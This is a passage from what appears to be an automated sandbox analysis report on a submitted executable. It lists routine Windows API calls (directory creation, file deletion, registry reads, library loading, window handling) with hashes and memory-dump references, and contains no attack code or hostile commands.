                                                                                                                            • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00453A24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: .tmp
                                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                                            • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                            • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                                            • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                            • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483F88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                            • API String ID: 3869789854-2936008475
                                                                                                                            • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                            • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                                            • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                            • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452908 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 2018770650-488339322
                                                                                                                            • Opcode ID: 8e20ab251d088d0bfaf69feb7d17608973a6f06366ba1158c9466a0d895ab982
                                                                                                                            • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                                            • Opcode Fuzzy Hash: 8e20ab251d088d0bfaf69feb7d17608973a6f06366ba1158c9466a0d895ab982
                                                                                                                            • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047C5D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                            • API String ID: 3535843008-1113070880
                                                                                                                            • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                            • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                                            • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                            • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047524C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CreateFile
                                                                                                                            • API String ID: 2528220319-823142352
                                                                                                                            • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                            • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                                            • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                            • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DE1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                                            • API String ID: 71445658-2565060666
                                                                                                                            • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                            • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                                            • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                            • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004570B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                            • API String ID: 2906209438-2320870614
                                                                                                                            • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                            • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                                            • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                            • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                            • API String ID: 2492108670-2683653824
                                                                                                                            • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                            • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                                            • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                            • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044852C Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2574300362-0
                                                                                                                            • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                            • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                                            • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                            • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00481C7C Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Append$System
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1489644407-0
                                                                                                                            • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                            • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                                            • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                            • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004243FC Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                                            • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                                            • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4217535847-0
                                                                                                                            • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                            • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                                            • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                            • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416644 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Prop$Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3363284559-0
                                                                                                                            • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                            • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                                            • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                            • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041EE54 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3234591441-0
                                                                                                                            • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                            • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                                            • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                            • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                                            Uniqueness

